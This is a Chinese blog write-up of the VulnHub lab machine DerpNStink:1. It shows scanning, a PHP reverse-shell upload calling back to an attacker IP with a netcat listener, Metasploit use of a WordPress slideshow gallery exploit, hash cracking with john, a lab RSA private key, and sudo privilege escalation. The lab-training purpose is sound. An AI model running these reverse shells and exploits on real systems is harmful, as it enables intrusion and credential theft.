DerpNStink: 1靶机攻略

最新推荐文章于 2024-08-07 21:29:57 发布
最新推荐文章于 2024-08-07 21:29:57 发布
阅读量283 收藏
点赞数
分类专栏: 网络安全基础 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46107438/article/details/132135770
版权

DerpNStink: 1靶机攻略

文章目录

各种扫描

  • 演示中靶机IP:192.168.88.129

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

#可进入的网页
http://192.168.88.129/
http://192.168.88.129/weblog/wp-admin/
http://192.168.88.129/weblog/
http://192.168.88.129/robots.txt
http://192.168.88.129/temporary/
http://192.168.88.129/php/phpmyadmin/

翻网页

  • 搜索到flag1

在这里插入图片描述

  • 浅浅试出了一个密码

在这里插入图片描述

  • 不是最新版本

在这里插入图片描述

  • 可以文件上传

在这里插入图片描述

  • phpmyadmin

在这里插入图片描述

企图建立连接

第一种:文件上传

  • 先在kali打开监听
nc -lvvp 8888
  • 利用之前找的上传入口上传
<?php
$sock = fsockopen('192.168.88.128',8888);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>

在这里插入图片描述

  • 连接成功

在这里插入图片描述

第二种:扫描漏洞

  • 使用WordPress漏洞扫描工具wpscan
wpscan --url http://derpnstink.local/weblog/

  • 发现问题
slideshow gallery

在这里插入图片描述

  • 找到攻击模块并使用
msfconsole
search slideshow gallery
use 0
set rhosts 192.168.88.129
set targeturi /weblog/
set wp_password admin
set wp_user admin
run

在这里插入图片描述

  • 连接成功

在这里插入图片描述

  • 进入shell

在这里插入图片描述

翻找文件

  • 有两个用户:
mrderp
stinky

在这里插入图片描述

  • 四处搜寻未果,想办法进入之前的数据库

  • /var/www/html/weblog页面找到博客配置文件wp-config.php

在这里插入图片描述

  • 发现数据库账户密码
root:mysql

在这里插入图片描述

进入数据库

在这里插入图片描述

在这里插入图片描述

  • 破解密码:–在/usr/share/wordlists/ 目录下有个rockyou压缩包,解压后可做为字典使用,比较大
john who --wordlist=../usr/share/wordlists/rockyou.txt
#指定字典破解
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41   #Unclestinky:wedgie57
$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/   #admin:admin
  • 启用终端,尝试登入
python -c "import pty;pty.spawn('/bin/bash')"
  • stinky尝试成功

在这里插入图片描述

翻用户文件

  • 找到一个key.txt

在这里插入图片描述

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
  • 一个.pcap文件

在这里插入图片描述

  • flag3

在这里插入图片描述

查看数据包文件

在这里插入图片描述

  • 找到密码 #找http中的post
mrderp:derpderpderpderpderpderpderp

sudo提权

在这里插入图片描述

  • 在指定目录里创建文件

在这里插入图片描述

mkdir 。。。
# 创建目录
echo '/bin/sh' > derpy.sh   
#也可以是"/bin/bash"等其他内容
chmod 777 derpy.sh
#赋权
sudo ./derpy.sh
#提权

注:

ssh -i key stinky@192.168.88.129 
#使用密钥登录  key即密钥文件
vulnhub:DeRPnStiNK
墨染的博客
10-09 1768
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)
m0_68117643的博客
08-01 1910
靶机(stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
渗透项目(七):DERPNSTINK: 1
Ays.Ie的博客
11-12 1561
本篇文章记录了作者第7个渗透项目,具体记录了渗透过程以及方法。
【渗透测试】VulnHub-DerpNStink: 1
m0_52923241的博客
11-21 3119
VulnHub-DerpNStink: 1VulnHub-DerpNStink: 1渗透测试详细流程小知识点常用工具 VulnHub-DerpNStink: 1渗透测试详细流程 小知识点 常用工具
VulnHub靶场篇15-DerpNStink:1
qq_35224240的博客
03-18 471
靶机地址:DerpNStink:1~ VulnHub 难易程度:3.0 / 10.0 文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢! 摘要:基础信息扫描后,访问网站服务,审查得到Flag1。使用WPScan扫描到slideshow-gallery插件的任意文件上传,通过msf得到一个网站shell,在配置文件中找到数据库密码,登陆进phpmyadmin,得到Flag2。破解数据库中用户的密码哈希值,使用jonh破解,使用su切换到sti.
看完这篇 教你玩转渗透测试靶机Vulnhub——DerpNStink:1
Aluxian_的博客
02-02 1725
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagmedium (中等的)1.信息收集工具得使用2.wpscan和msfconsole的使用,了解模块的利用3.curl读取源码,以及msf反弹shell到本机 (这个是新知识的需要学习)4.数据库的增删改查 以及查看的相关命令,john字典爆破5.SSH。
Vulnhub:GAARA:1靶机
logan_logan的博客
06-06 811
1.在浏览器中输入目标靶机IP地址,浏览网页 2.端口扫描 nmap -p- 192.168.31.144 nmap -sC -sV -p 22,80 192.168.31.144 3.目录枚举 扫描到一个Cryoserver目录,接下来在网页中打开 gobuster dir -u http://192.168.31.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 在浏览器中打开这个目录之后,在底部存在三个提示
SO SIMPLE: 1靶机
logan_logan的博客
07-22 323
1.在浏览器输入地址打开 2.端口扫描 nmap -A -p- -T4 10.36.101.171 开的端口不是很多,不过可以看到8443端口后面包含有LXD的信息,说不定在提权的时候能用到; 3.目录枚举 目录枚举的时候看到有wordpress,准备上Wpscan工具进行枚举; 4.在网页打开这个目录 查看源代码的时候发现Social Warfare竟然是3.5版本的,判断很可能出现Social Warfare <= 3.5.2 - Unauthenticated Remote Code
Vulnhub之Chronos:1 靶机实验
weixin_64112307的博客
06-30 1098
EJS-RCE
sunset: noontide靶机渗透-vulnhub
m0_68117643的博客
07-18 1128
这台靶机(sunsetnoontide)运行在Vmware中无法获取靶机IP,换VirtualBox后NAT和桥接模式下也未获取到IP,仅在host-only模式下才找到靶机IP 突破点:反弹shell—root弱口令提权
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 2147
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 894
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 1014
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
No.7-VulnHub-DerpNStink: 1-Walkthrough渗透学习
qq_34801745的博客
01-04 1673
** VulnHub-DerpNStink: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中级(CTF) 靶机发布日期:2018年2月9日 靶机描述:This is a boot2root Ubuntu based virtual machine. It was tested on VMwar...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(五)DerpNStink:1【从外部网站到穿透内网提权!! !】
hyjcking的博客
11-28 933
这台靶机我用了将近两天的时间才拿下,真的是比较有难度的一台中级靶机,里面涉及到了许多渗透测试的知识和技巧,值得花时间好好研究一番。可以发现建站用的是wordpress,hh这就很舒服了,一般在打靶的时候发现wordpress建站说明就是突破口,我们可以用wpscan扫一下。得到密码为wedgie57,再登录一下刚才登的网站,用户名是Unclestinky,只找到了之前在数据库发现的flag2,没有其他信息了。之前nmap扫出来过22端口,尝试ssh登录,发现没法用密码登录,需要指纹密钥。
vulnhub靶机渗透 DeRPnStiNK_1
RestoreJustice的博客
03-18 350
发现weblog目录,进而找到网站后台,网站使用的cms是WordPress。访问该目录会自动跳转到http://derpnstink.local/weblog/ 我这里可以直接访问,如果有需要的话的绑定host。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。先在当前用户文件下找。在/Documents找到,derpissues.pcap,拷贝到前面连接一句话木马的蚁剑可访问的目录,用蚁剑下载下来。
【甄选靶场】Vulnhub百个项目渗透——项目七:DerpNStink-1(sql注入,流量分析)
人间体佐菲的博客
08-23 2352
【专为新人甄选】Vulnhub百个项目渗透——项目七:DerpNStink-1
DERPNSTINK: 1-打靶渗透【附代码】(权限提升)
最新发布
weixin_52487093的博客
08-07 1063
DERPNSTINK: 1-打靶渗透【附代码】(权限提升) #DNS的hosts域名解析问题 #CVE-2021-4034的利用
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8544
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
HackMePlease靶机攻略:SeedDMS管理系统漏洞利用
"hack me please靶机攻略文档详细介绍了如何对一个名为'hack me please'的靶机进行渗透测试的过程,主要包括主机发现、信息收集、端口扫描、源码分析、漏洞利用和权限提升等环节。" 在这篇攻略中,首先提到了使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值